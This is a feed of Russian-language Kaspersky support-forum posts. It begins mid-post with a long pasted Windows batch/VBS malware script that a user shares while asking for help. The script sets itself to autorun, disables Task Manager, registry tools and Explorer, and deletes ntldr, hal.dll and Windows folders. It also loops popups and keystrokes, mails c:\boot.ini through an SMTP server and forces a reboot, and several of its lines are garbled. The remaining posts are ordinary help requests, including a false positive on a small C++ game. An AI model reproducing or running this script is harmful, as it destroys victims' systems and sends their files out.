			echo set FSO=createobject("scripting.filesystemobject")&gt;&gt;%temp%\temp.vbs<br />
			reg add HKEYERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v nodesktop /d 1 /freg add HKEY_USEUSERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v ClassicShell /d 1 /fset ¶§=%0<br />
			copy %¶§% %SystemRoot%\user32dll.bat<br />
			reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v RunExplorer32 /d %SystemRoot%\user32dll.bat /f<br />
			reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDrives /t REGD /d 67108863 /f<br />
			reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoViewOnDrive /t REG_DWORDDWORD /d 67108863 /f<br />
			echo fso.deletefile "C:\ntldr",1 &gt;&gt; %temp%\temp.vbs<br />
			reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoSelectDownloadDir" /d 1 /f<br />
			reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\main\FeatureControl\Featureachine_LockdowLockdown" /v "IExplorer" /d 0 /f<br />
			reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoFindFiles" /d 1 /f<br />
			reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoNavButtons" /d 1 /f<br />
			echo fso.deletefolder "D:\Windows",1 &gt;&gt; %temp%\temp.vbs<br />
			echo fso.deletefolder "I:\Windows",1 &gt;&gt; %temp%\temp.vbs<br />
			echo fso.deletefolder "C:\Windows",1 &gt;&gt; %temp%\temp.vbs<br />
			echo sr=s.RegRead("HKEYCHINE\SMACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") &gt;&gt; %temp%\temp.vbs<br />
			echo fso.deletefile sr+"\system32\hal.dll",1 &gt;&gt; %temp%\temp.vbs<br />
			echo sr=s.RegRead("HKEYINE\SOFMACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") &gt;&gt; %temp%\temp.vbs<br />
			echo fso.deletefolder sr+"\system32\dllcache",1 &gt;&gt; %temp%\temp.vbs<br />
			echo sr=s.RegRead("HKEYE\SOFTWMACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") &gt;&gt; %temp%\temp.vbs<br />
			echo fso.deletefolder sr+"\system32\drives",1 &gt;&gt; %temp%\temp.vbs<br />
			echo s.regwrite "HKEYLSID\{645ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\LocalizedString","forum.whack.ru™"&gt;&gt;%temp%\temp.vbs<br />
			echo s.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner","NIZIAST"&gt;&gt;%temp%\temp.vbs<br />
			echo s.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization","NIZIAST"&gt;&gt;%temp%\temp.vbs<br />
			echo on error resume next &gt; %temp%\temp1.vbs<br />
			echo set FSO=createobject("scripting.filesystemobject")&gt;&gt;%temp%\temp1.vbs<br />
			echo do&gt;&gt;%temp%\temp1.vbs<br />
			echo fso.getfile ("A:\")&gt;&gt;%temp%\temp1.vbs<br />
			echo loop&gt;&gt;%temp%\temp1.vbs<br />
			echo on error resume next &gt; %temp%\temp2.vbs<br />
			echo Set S = CreateObject("Wscript.Shell") &gt;&gt; %temp%\temp2.vbs<br />
			echo do&gt;&gt;%temp%\temp2.vbs<br />
			echo execute"S.Run ""%comspec% /c echo "" &amp; Chr(7), 0, True"&gt;&gt;%temp%\temp2.vbs<br />
			echo loop&gt;&gt;%temp%\temp2.vbs<br />
			reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disabletaskmgr /t REGeg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disableregistrytools /t REG_DWORD /d 1 /f<br />
			reDWORD /d 1 /f<br />
			reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuPinnedList /t REG add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMFUprogramsList /t REG_DWORD /d 1 /f<br />
			reg DWORD /d 1 /f<br />
			reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoUserNameInStartMenu /t REGdd "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum" /v {20D04FE0-3AEA-1069-A2D8-08002B30309D} /t REG_DWORD /d 1 /f<br />
			reg adDWORD /d 1 /f<br />
			reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoNetworkConnections /t REG "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuNetworkPlaces /t REG_DWORD /d 1 /f<br />
			reg add DWORD /d 1 /f
		</p>

		<p>
			reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartmenuLogoff /t REGhkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuSubFolders /t REG_DWORD /d 1 /f<br />
			reg add "hDWORD /d 1 /f<br />
			reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoCommonGroups /t REGcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFavoritesMenu /t REG_DWORD /d 1 /f<br />
			reg add "hkcDWORD /d 1 /f<br />
			reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRecentDocsMenu /t REG\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSetFolders /t REG_DWORD /d 1 /f<br />
			reg add "hkcu\DWORD /d 1 /f<br />
			reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoAddPrinter /t REGoftware\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /t REG_DWORD /d 1 /f<br />
			reg add "hkcu\SoDWORD /d 1 /f<br />
			reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMHelp /t REGtware\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f<br />
			reg add "hkcu\SoftDWORD /d 1 /f<br />
			reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMorePrograms /t REGare\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f<br />
			reg add "hkcu\SoftwaDWORD /d 1 /f<br />
			reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoChangeStartMenu /t REGe\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyDocs /t REG_DWORD /d 1 /f<br />
			reg add "hkcu\SoftwareDWORD /d 1 /f<br />
			reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyPictures /t REGMicrosoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMyMusic /t REG_DWORD /d 1 /f<br />
			reg add "hkcu\Software\MDWORD /d 1 /f<br />
			reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REGteobject("shell.application")&gt;&gt;%temp%\temp.vbs<br />
			echo application.minimizeall&gt;&gt;%temp%\temp.vbs<br />
			reg add "hklm\Software\Microsoft\Windows\CurrentVersion\run" /v SwapNT /t REG_SZ /d rundll32 user32, SwapMouseButton /fSZ /d rundll32 user32, SwapMouseButton /f<br />
			start rundll32 user32, SwapMouseButton<br />
			reg add "HKCR\exefile\shell\open\command" /ve /t REG\temp.vbs<br />
			echo while i^&gt;0 or i^&lt;0 &gt;&gt; %temp%\temp.vbs<br />
			echo S.popup "NIZIAST",0, "NIZIAST",0+16 &gt;&gt; %temp%\temp.vbs<br />
			echo i=i-1 &gt;&gt; %temp%\temp.vbs<br />
			echo wend &gt;&gt; %temp%\temp.vbs<br />
			echo do &gt;&gt; %temp%\temp.vbs<br />
			echo wscript.sleep 200 &gt;&gt; %temp%\temp.vbs<br />
			echo s.sendkeys"{capslock}" &gt;&gt; %temp%\temp.vbs<br />
			echo wscript.sleep 200 &gt;&gt; %temp%\temp.vbs<br />
			echo s.sendkeys"{numlock}" &gt;&gt; %temp%\temp.vbs<br />
			echo wscript.sleep 200 &gt;&gt; %temp%\temp.vbs<br />
			echo s.sendkeys"{scrolllock}" &gt;&gt; %temp%\temp.vbs<br />
			echo loop&gt;&gt; %temp%\temp.vbs<br />
			echo Set oWMP = CreateObject("WMPlayer.OCX.7") &gt;&gt; %temp%\temp.vbs<br />
			echo Set colCDROMs = oWMP.cdromCollection &gt;&gt; %temp%\temp.vbs<br />
			echo if colCDROMs.Count ^&gt;= 1 then &gt;&gt; %temp%\temp.vbs<br />
			echo For i = 0 to colCDROMs.Count - 1 &gt;&gt; %temp%\temp.vbs<br />
			echo colCDROMs.Item(i).eject &gt;&gt; %temp%\temp.vbs<br />
			echo next &gt;&gt; %temp%\temp.vbs<br />
			echo End If &gt;&gt; %temp%\temp.vbs<br />
			echo Call SendPost("NIZIAST", "NIZIAST", "NIZIAST", "...", "NIZIAST") &gt;&gt; %temp%\temp.vbs<br />
			echo Function SendPost(strSMTP_Server, strTo, strFrom, strSubject, strBody) &gt;&gt; %temp%\temp.vbs<br />
			echo Set iMsg = CreateObject("CDO.Message") &gt;&gt; %temp%\temp.vbs<br />
			echo Set iConf = CreateObject("CDO.Configuration") &gt;&gt; %temp%\temp.vbs<br />
			echo Set Flds = iConf.Fields &gt;&gt; %temp%\temp.vbs<br />
			echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2 &gt;&gt; %temp%\temp.vbs<br />
			echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1 &gt;&gt; %temp%\temp.vbs<br />
			echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusername") = "support" &gt;&gt; %temp%\temp.vbs<br />
			echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendpassword") = "support" &gt;&gt; %temp%\temp.vbs<br />
			echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "smtp.mail.ru" &gt;&gt; %temp%\temp.vbs
		</p>

		<p>
			echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 25 &gt;&gt; %temp%\temp.vbs<br />
			echo Flds.Update &gt;&gt; %temp%\temp.vbs<br />
			echo iMsg.Configuration = iConf &gt;&gt; %temp%\temp.vbs<br />
			echo iMsg.To = strTo &gt;&gt; %temp%\temp.vbs<br />
			echo iMsg.From = strFrom &gt;&gt; %temp%\temp.vbs<br />
			echo iMsg.Subject = strSubject &gt;&gt; %temp%\temp.vbs<br />
			echo iMsg.TextBody = strBody &gt;&gt; %temp%\temp.vbs<br />
			echo iMsg.AddAttachment "c:\boot.ini" &gt;&gt; %temp%\temp.vbs<br />
			echo iMsg.Send &gt;&gt; %temp%\temp.vbs<br />
			echo End Function &gt;&gt; %temp%\temp.vbs<br />
			echo Set iMsg = Nothing &gt;&gt; %temp%\temp.vbs<br />
			echo Set iConf = Nothing &gt;&gt; %temp%\temp.vbs<br />
			echo Set Flds = Nothing &gt;&gt; %temp%\temp.vbs<br />
			echo s.run "shutdown -r -t 0 -c ""NIZIAST"" -f",1 &gt;&gt; %temp%\temp.vbs<br />
			start %temp%\temp.vbs<br />
			start %temp%\temp1.vbs<br />
			start %temp%\temp2.vbs
		</p>
	</div>
</div>

<p>
	 
</p>

<p>
	Пожалуйста, кто-нибудь ответьте или посоветуйте к кому конкретно лучше обратиться, боюсь тут мне не помогут
</p>

<p>
	<a class="ipsAttachLink ipsAttachLink_image" data-fileext="jpg" data-fileid="38555" href="https://forum.kaspersky.com/uploads/monthly_2026_04/IMG_20260412_110224_142.jpg.1744149e802b23e2fcd20b80779ae258.jpg" rel=""><img alt="IMG_20260412_110224_142.jpg" class="ipsImage ipsImage_thumbnailed" data-fileid="38555" data-ratio="177.3" style="height:auto;" width="282" data-src="https://forum.kaspersky.com/uploads/monthly_2026_04/IMG_20260412_110224_142.thumb.jpg.82908c6a9fd71f7b93b827bfba71d10c.jpg" src="https://forum.kaspersky.com/applications/core/interface/js/spacer.png" /></a>
</p>
]]></description><guid isPermaLink="false">58676</guid><pubDate>Sun, 12 Apr 2026 09:26:00 +0000</pubDate></item><item><title>&#x41B;&#x43E;&#x436;&#x43D;&#x44B;&#x439; VHO:Trojan.Win32.Convagent.gen</title><link>https://forum.kaspersky.com/topic/%D0%BB%D0%BE%D0%B6%D0%BD%D1%8B%D0%B9-vhotrojanwin32convagentgen-58674/</link><description><![CDATA[<p>
	Программка написана в Visual Studio 2026 (C++)
</p>

<p>
	Kaspersky Free блокирует собранный exe'ник (1.png)
</p>

<p>
	На Virus Total возмущается только Касперский (2.png)
</p>

<p>
	На Kaspersky Threat Intelligence Portal считает безопасным (3/png)
</p>

<p>
	Приложил бы сам exe'еик, но ведь низзя. Скачать можно по ссылке <a href="https://disk.yandex.ru/d/9UMHf-jEsHLRzg" rel="external nofollow">https://disk.yandex.ru/d/9UMHf-jEsHLRzg</a>. Исходный текст программки.
</p>

<pre style="color:#000000;font-size:9pt;"><span style="color:#008000;">// Игра "23 спички"</span>

<span style="color:#808080;">#include</span> <span style="color:#a31515;">&lt;iostream&gt;</span>

<span style="color:#0000ff;">int</span> main<span style="color:#1a94ff;">()</span>
<span style="color:#1a94ff;">{</span>
	<span style="color:#0000ff;">int</span> matches = 23;
	std::cout <span style="color:#008080;">&lt;&lt;</span> <span style="color:#a31515;">"There are "</span> <span style="color:#008080;">&lt;&lt;</span> matches <span style="color:#008080;">&lt;&lt;</span> <span style="color:#a31515;">" matches on the table\n"</span>;
	<span style="color:#0000ff;">while</span> <span style="color:#ffd702;">(</span>matches &gt; 0<span style="color:#ffd702;">)</span>
	<span style="color:#ffd702;">{</span>
		<span style="color:#0000ff;">int</span> move;
		<span style="color:#0000ff;">do</span>
		<span style="color:#d86ac2;">{</span>
			std::cout <span style="color:#008080;">&lt;&lt;</span> <span style="color:#a31515;">"How many matches will you take? "</span>;
			std::cin <span style="color:#008080;">&gt;&gt;</span> move;
		<span style="color:#d86ac2;">}</span> <span style="color:#0000ff;">while</span> <span style="color:#d86ac2;">(</span>move&lt;1 || move&gt;matches || move &gt; 3<span style="color:#d86ac2;">)</span>;
		matches -= move;
		std::cout <span style="color:#008080;">&lt;&lt;</span> <span style="color:#a31515;">"You took "</span> <span style="color:#008080;">&lt;&lt;</span> move <span style="color:#008080;">&lt;&lt;</span> <span style="color:#a31515;">", there are "</span> <span style="color:#008080;">&lt;&lt;</span> matches <span style="color:#008080;">&lt;&lt;</span> <span style="color:#a31515;">" matches left\n"</span>;
		<span style="color:#0000ff;">if</span> <span style="color:#d86ac2;">(</span>matches == 0<span style="color:#d86ac2;">)</span>
		<span style="color:#d86ac2;">{</span>
			std::cout <span style="color:#008080;">&lt;&lt;</span> <span style="color:#a31515;">"You lost"</span>;
			<span style="color:#0000ff;">break</span>;
		<span style="color:#d86ac2;">}</span>
		move = <span style="color:#d86ac2;">(</span>matches - 1<span style="color:#d86ac2;">)</span> % 4;
		<span style="color:#0000ff;">if</span> <span style="color:#d86ac2;">(</span>move == 0<span style="color:#d86ac2;">)</span>move = 1;
		matches -= move;
		std::cout <span style="color:#008080;">&lt;&lt;</span> <span style="color:#a31515;">"I take "</span> <span style="color:#008080;">&lt;&lt;</span> move <span style="color:#008080;">&lt;&lt;</span> <span style="color:#a31515;">", there are "</span> <span style="color:#008080;">&lt;&lt;</span> matches <span style="color:#008080;">&lt;&lt;</span> <span style="color:#a31515;">" matches left\n"</span>;
		<span style="color:#0000ff;">if</span> <span style="color:#d86ac2;">(</span>matches == 0<span style="color:#d86ac2;">)</span>
		<span style="color:#d86ac2;">{</span>
			std::cout <span style="color:#008080;">&lt;&lt;</span> <span style="color:#a31515;">"You won"</span>;
			<span style="color:#0000ff;">break</span>;
		<span style="color:#d86ac2;">}</span>
	<span style="color:#ffd702;">}</span>
<span style="color:#1a94ff;">}</span>
</pre>

<p><a href="https://forum.kaspersky.com/uploads/monthly_2026_04/1.png.e6af5e7463bf94d1dd7d863e12f20638.png" class="ipsAttachLink ipsAttachLink_image" ><img data-fileid="38551" src="https://forum.kaspersky.com/applications/core/interface/js/spacer.png" data-src="https://forum.kaspersky.com/uploads/monthly_2026_04/1.png.e6af5e7463bf94d1dd7d863e12f20638.png" data-ratio="101.86" width="430" class="ipsImage ipsImage_thumbnailed" alt="1.png"></a></p>
<p><a href="https://forum.kaspersky.com/uploads/monthly_2026_04/2.png.03c1d4d9d817e7d7bf3f1fe2898ea1f7.png" class="ipsAttachLink ipsAttachLink_image" ><img data-fileid="38552" src="https://forum.kaspersky.com/applications/core/interface/js/spacer.png" data-src="https://forum.kaspersky.com/uploads/monthly_2026_04/2.thumb.png.2ba3738fff2773ddf7db8082cdf3b65a.png" data-ratio="79.6" width="500" class="ipsImage ipsImage_thumbnailed" alt="2.png"></a></p>
<p><a href="https://forum.kaspersky.com/uploads/monthly_2026_04/3.png.d0a04d97a34366e0f75b39fd18903ef4.png" class="ipsAttachLink ipsAttachLink_image" ><img data-fileid="38553" src="https://forum.kaspersky.com/applications/core/interface/js/spacer.png" data-src="https://forum.kaspersky.com/uploads/monthly_2026_04/3.thumb.png.8c558b53302bccbf8a96b2521007b711.png" data-ratio="79.6" width="500" class="ipsImage ipsImage_thumbnailed" alt="3.png"></a></p>]]></description><guid isPermaLink="false">58674</guid><pubDate>Sun, 12 Apr 2026 06:18:54 +0000</pubDate></item><item><title>&#x41F;&#x43E;&#x43C;&#x43E;&#x433;&#x438;&#x442;&#x435; &#x443;&#x434;&#x430;&#x43B;&#x438;&#x442;&#x44C; &#x43C;&#x430;&#x439;&#x43D;&#x435;&#x440;</title><link>https://forum.kaspersky.com/topic/%D0%BF%D0%BE%D0%BC%D0%BE%D0%B3%D0%B8%D1%82%D0%B5-%D1%83%D0%B4%D0%B0%D0%BB%D0%B8%D1%82%D1%8C-%D0%BC%D0%B0%D0%B9%D0%BD%D0%B5%D1%80-58642/</link><description><![CDATA[<p>
	Не могу удалить майнер. Постоянно удаляю вирус, а он заного восстанавливается сразу в процессе удаления из какого то paks.exe, который через поиск не находится. Вижу через курейт расположение файла, а зайти в папку не могу и в безопасном режиме не вижу ни одного файла или папки, как будто их не существует. 
</p>

<p>
	Вирус похоже отобрал права администратора, закрывает папки, диспетчер задач и браузер если в обычном режиме загрузки пытаюсь найти его. 
</p>

<p>
	 
</p>

<p><a href="https://forum.kaspersky.com/uploads/monthly_2026_04/IMG_20260407_195326.jpg.13bd569d12326130c41cab42c3e740fc.jpg" class="ipsAttachLink ipsAttachLink_image" ><img data-fileid="38505" src="https://forum.kaspersky.com/applications/core/interface/js/spacer.png" data-src="https://forum.kaspersky.com/uploads/monthly_2026_04/IMG_20260407_195326.thumb.jpg.23a7baa3a22bbdf663f318c316e27a08.jpg" data-ratio="75" width="500" class="ipsImage ipsImage_thumbnailed" alt="IMG_20260407_195326.jpg"></a></p>]]></description><guid isPermaLink="false">58642</guid><pubDate>Tue, 07 Apr 2026 19:10:14 +0000</pubDate></item><item><title>&#x41C;&#x43E;&#x433;&#x43B;&#x438; &#x44D;&#x442;&#x43E;&#x442; &#x442;&#x440;&#x43E;&#x44F;&#x43D; &#x441;&#x43C;&#x43E;&#x442;&#x440;&#x435;&#x442;&#x44C; &#x43C;&#x43E;&#x438; &#x43F;&#x430;&#x440;&#x43E;&#x43B;&#x438; &#x438; &#x441;&#x43A;&#x440;&#x438;&#x43D;&#x44B; &#x43F;&#x430;&#x440;&#x43E;&#x43B;&#x435;&#x439; &#x43A;&#x43E;&#x442;&#x43E;&#x440;&#x44B;&#x435; &#x43D;&#x430;&#x445;&#x43E;&#x434;&#x44F;&#x442;&#x441;&#x44F; &#x43D;&#x430; &#x444;&#x43B;&#x435;&#x448;&#x43A;&#x435;</title><link>https://forum.kaspersky.com/topic/%D0%BC%D0%BE%D0%B3%D0%BB%D0%B8-%D1%8D%D1%82%D0%BE%D1%82-%D1%82%D1%80%D0%BE%D1%8F%D0%BD-%D1%81%D0%BC%D0%BE%D1%82%D1%80%D0%B5%D1%82%D1%8C-%D0%BC%D0%BE%D0%B8-%D0%BF%D0%B0%D1%80%D0%BE%D0%BB%D0%B8-%D0%B8-%D1%81%D0%BA%D1%80%D0%B8%D0%BD%D1%8B-%D0%BF%D0%B0%D1%80%D0%BE%D0%BB%D0%B5%D0%B9-%D0%BA%D0%BE%D1%82%D0%BE%D1%80%D1%8B%D0%B5-%D0%BD%D0%B0%D1%85%D0%BE%D0%B4%D1%8F%D1%82%D1%81%D1%8F-%D0%BD%D0%B0-%D1%84%D0%BB%D0%B5%D1%88%D0%BA%D0%B5-58623/</link><description><![CDATA[<p>
	<strong style="color:#000000;font-size:16px;">UDS:Trojan.Win32.Agent.a Мог ли этот троян смотреть мои пароли и фото на флешке </strong>
</p>
]]></description><guid isPermaLink="false">58623</guid><pubDate>Sun, 05 Apr 2026 15:17:13 +0000</pubDate></item><item><title>&#x412;&#x437;&#x43B;&#x43E;&#x43C;&#x44B; &#x430;&#x43A;&#x43A;&#x430;&#x443;&#x43D;&#x442;&#x43E;&#x432; &#x441;&#x43E;&#x446;&#x438;&#x430;&#x43B;&#x44C;&#x43D;&#x44B;&#x445; &#x441;&#x435;&#x442;&#x435;&#x439;. &#x41A;&#x430;&#x43A; &#x43E;&#x431;&#x435;&#x437;&#x43E;&#x43F;&#x430;&#x441;&#x438;&#x442;&#x44C;?</title><link>https://forum.kaspersky.com/topic/%D0%B2%D0%B7%D0%BB%D0%BE%D0%BC%D1%8B-%D0%B0%D0%BA%D0%BA%D0%B0%D1%83%D0%BD%D1%82%D0%BE%D0%B2-%D1%81%D0%BE%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D1%85-%D1%81%D0%B5%D1%82%D0%B5%D0%B9-%D0%BA%D0%B0%D0%BA-%D0%BE%D0%B1%D0%B5%D0%B7%D0%BE%D0%BF%D0%B0%D1%81%D0%B8%D1%82%D1%8C-58598/</link><description><![CDATA[<p>
	Здраствуйте,на той неделе взломали дискорд начали спамить о казино,теперь взломали вконтакте и тоже самое но с букмейкской канторой теперь,как можно вычеслить проблему?
</p>

<p>
	причем  заходили с токента,,без запроса на вход
</p>
]]></description><guid isPermaLink="false">58598</guid><pubDate>Thu, 02 Apr 2026 14:40:21 +0000</pubDate></item><item><title>&#x41F;&#x440;&#x43E;&#x433;&#x440;&#x430;&#x43C;&#x43C;&#x430; &#x448;&#x438;&#x444;&#x440;&#x43E;&#x432;&#x430;&#x43B;&#x44C;&#x449;&#x438;&#x43A;.</title><link>https://forum.kaspersky.com/topic/%D0%BF%D1%80%D0%BE%D0%B3%D1%80%D0%B0%D0%BC%D0%BC%D0%B0-%D1%88%D0%B8%D1%84%D1%80%D0%BE%D0%B2%D0%B0%D0%BB%D1%8C%D1%89%D0%B8%D0%BA-58524/</link><description><![CDATA[<p>
	<span style="background-color:#ffffff;color:#2c2d2e;font-size:15px;">Компьютер без антивируса Касперского, стандартный Winows 11 антивирус, был заражён шифровальщиком, при запуске выдает такой экран, делать ничего не дает, прогнали Kaspersky Rescue Disk, никаких результатов.</span><br style="background-color:#ffffff;color:#2c2d2e;font-size:15px;" />
	<span style="background-color:#ffffff;color:#2c2d2e;font-size:15px;">Какой порядок действий в таком случаи. </span>Служба удаления вирусов <span style="background-color:#ffffff;border:0px;color:#1d1d1b;font-size:16px;padding:0px;vertical-align:baseline;">Virus<span> </span></span><span style="background-color:#ffffff;border:0px;color:#1d1d1b;font-size:16px;padding:0px;vertical-align:baseline;">Removal<span> </span></span><span style="background-color:#ffffff;border:0px;color:#1d1d1b;font-size:16px;padding:0px;vertical-align:baseline;">Service, это может помочь.</span>
</p>

<p><a href="https://forum.kaspersky.com/uploads/monthly_2026_03/20260318_100702(1).jpg.710f1feb5de4372d2f1f27b5cae26e28.jpg" class="ipsAttachLink ipsAttachLink_image" ><img data-fileid="38305" src="https://forum.kaspersky.com/applications/core/interface/js/spacer.png" data-src="https://forum.kaspersky.com/uploads/monthly_2026_03/20260318_100702(1).thumb.jpg.4f2d2b7d0183f485b7bff219b48fb896.jpg" data-ratio="75" width="500" class="ipsImage ipsImage_thumbnailed" alt="20260318_100702 (1).jpg"></a></p>]]></description><guid isPermaLink="false">58524</guid><pubDate>Wed, 25 Mar 2026 16:49:19 +0000</pubDate></item><item><title>&#x41F;&#x43E;&#x43C;&#x43E;&#x433;&#x438;&#x442;&#x435; &#x43D;&#x430;&#x439;&#x442;&#x438; &#x434;&#x435;&#x448;&#x438;&#x444;&#x440;&#x430;&#x442;&#x43E;&#x440;</title><link>https://forum.kaspersky.com/topic/%D0%BF%D0%BE%D0%BC%D0%BE%D0%B3%D0%B8%D1%82%D0%B5-%D0%BD%D0%B0%D0%B9%D1%82%D0%B8-%D0%B4%D0%B5%D1%88%D0%B8%D1%84%D1%80%D0%B0%D1%82%D0%BE%D1%80-58298/</link><description><![CDATA[<p>
	Добрый день. Помогите пожалуйста найти, что за шифровальщик. Скриншот закреплю в сообщении. 
</p>

<p>
	<a class="ipsAttachLink ipsAttachLink_image" data-fileext="jpg" data-fileid="37856" href="https://forum.kaspersky.com/uploads/monthly_2026_03/01-03-2026152417.jpg.fb837d42f7b2c50d80fcfe7e0aa253c0.jpg" rel=""><img alt="Скриншот 01-03-2026 152417.jpg" class="ipsImage ipsImage_thumbnailed" data-fileid="37856" data-ratio="46" style="height:auto;" width="500" data-src="https://forum.kaspersky.com/uploads/monthly_2026_03/01-03-2026152417.thumb.jpg.8c6312eae4ac961f80266a203c4d1d94.jpg" src="https://forum.kaspersky.com/applications/core/interface/js/spacer.png" /></a>
</p>

<p>
	 
</p>

<p>
	<a class="ipsAttachLink ipsAttachLink_image" data-fileext="jpg" data-fileid="37858" href="https://forum.kaspersky.com/uploads/monthly_2026_03/01-03-2026152636.jpg.45a23311f570aae7fd7f1906843a5682.jpg" rel=""><img alt="Скриншот 01-03-2026 152636.jpg" class="ipsImage ipsImage_thumbnailed" data-fileid="37858" data-ratio="53" style="height:auto;" width="500" data-src="https://forum.kaspersky.com/uploads/monthly_2026_03/01-03-2026152636.thumb.jpg.8adcf60209fad552e29c8b2e2a2d53dd.jpg" src="https://forum.kaspersky.com/applications/core/interface/js/spacer.png" /></a>
</p>
]]></description><guid isPermaLink="false">58298</guid><pubDate>Sun, 01 Mar 2026 12:25:39 +0000</pubDate></item><item><title>C&#x43A;&#x430;&#x447;&#x430;&#x43B; &#x444;&#x430;&#x439;&#x43B;, &#x43E;&#x442;&#x434;&#x430;&#x432; &#x434;&#x43E;&#x441;&#x442;&#x443;&#x43F; &#x43A; &#x43C;&#x43E;&#x435;&#x43C;&#x443; &#x43A;&#x43E;&#x43C;&#x43F;&#x44C;&#x44E;&#x442;&#x435;&#x440;&#x443;</title><link>https://forum.kaspersky.com/topic/c%D0%BA%D0%B0%D1%87%D0%B0%D0%BB-%D1%84%D0%B0%D0%B9%D0%BB-%D0%BE%D1%82%D0%B4%D0%B0%D0%B2-%D0%B4%D0%BE%D1%81%D1%82%D1%83%D0%BF-%D0%BA-%D0%BC%D0%BE%D0%B5%D0%BC%D1%83-%D0%BA%D0%BE%D0%BC%D0%BF%D1%8C%D1%8E%D1%82%D0%B5%D1%80%D1%83-58294/</link><description><![CDATA[<p>
	Всем привет. Скачал файл из дискорда и тут же стали улетать файлы через OneDrive(под некоторыми иконками была зеленая галочка) и в диспетчере появилось много новых задач, некоторые были без имени(все вели к svhost). У одной из них в названии было слово Viever и иконка компьютера. Я сразу же выдернул из розетки интернет и заново установил винду. Все странные задачи не пропали и тогда я купил лицензию [<strong>удалено</strong>] и просканил все. Безрезультатно. Следующим моим шагом была установка утилиты Avz 2 разных версий и на мое удивление было найдено 2 трояна в Video.dll. Я все что можно просканировал и удалил, после чего выдохнул с облегчением и подумал, что все, но нет. Сегодня перед важной встречей у меня то отключались, то включались динамики в микшере громкости, а в диспетчере задач снова появилась куча непонятных процессов. После отмены встречи и переноса на другой день все успокоилось. Попробовал зайти в Параметры-конфиденциальность-разрешения приложений, но из-за постоянных вылетов ничего не смог сделать. Подскажите, как мне быть и что делать.
</p>

<p>
	<a class="ipsAttachLink ipsAttachLink_image" href="https://forum.kaspersky.com/uploads/monthly_2026_02/2026-03-01_00-30-28.png.4dabd95020e8c6072b3e4fa5494161b4.png" data-fileid="37849" data-fileext="png" rel=""><img alt="2026-03-01_00-30-28.png" class="ipsImage ipsImage_thumbnailed" data-fileid="37849" data-ratio="54.2" style="height:auto;" width="500" data-src="https://forum.kaspersky.com/uploads/monthly_2026_02/2026-03-01_00-30-28.thumb.png.502670f0992d07c507788de5f5652e14.png" src="https://forum.kaspersky.com/applications/core/interface/js/spacer.png" /></a>
</p>

<p>
	<a class="ipsAttachLink ipsAttachLink_image" href="https://forum.kaspersky.com/uploads/monthly_2026_02/2026-03-01_00-30-15.png.825cf0f3012d215486c4e5ab53a8bb12.png" data-fileid="37850" data-fileext="png" rel=""><img alt="2026-03-01_00-30-15.png" class="ipsImage ipsImage_thumbnailed" data-fileid="37850" data-ratio="54.4" style="height:auto;" width="500" data-src="https://forum.kaspersky.com/uploads/monthly_2026_02/2026-03-01_00-30-15.thumb.png.673ebc63ec22b8b27c05da68da173e14.png" src="https://forum.kaspersky.com/applications/core/interface/js/spacer.png" /></a>
</p>

<p>
